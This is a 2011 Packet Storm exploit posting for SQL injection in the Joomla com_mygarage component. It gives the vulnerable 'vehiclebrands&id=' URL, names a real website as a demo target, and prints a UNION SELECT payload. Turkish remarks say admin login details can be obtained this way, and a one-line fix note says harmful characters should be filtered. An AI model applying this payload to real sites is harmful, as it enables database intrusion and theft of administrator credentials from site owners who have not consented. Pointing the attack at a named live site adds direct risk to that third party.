Joomla MyGarage SQL Injection

2011-02-18T00:00:00
ID PACKETSTORM:98570
Type packetstorm
Reporter Fl0riX
Modified 2011-02-18T00:00:00

Description

                                        
                                            `  
<------------------- header data start ------------------- >  
#############################################################  
Joomla Component mygarage SQL Injection Vulnerability   
#############################################################  
  
# Author : Fl0riX ~ Bug Researchers  
  
# Name : Joomla com_mygarage  
  
# Bug Type : SQL injection  
  
# Infection : Admin Login Bilgileri Alinabilir.  
  
# Demo Vuln :  
[+]/index.php?option=com_mygarage&view=vehiclebrands&id=[EXPLOIT]  
  
[+] Demo Site:http://drivven.net/component/mygarage/  
  
# Bug Fix Advice : Zararli Karakterler Filtrenmelidir.  
#############################################################  
< ------------------- header data end of ------------------- >  
< -- bug code start -- >  
EXPLOIT :  
null/**/union/**/select/**/1,user()fl0rix,3/*  
< -- bug code end of -- >   
  
`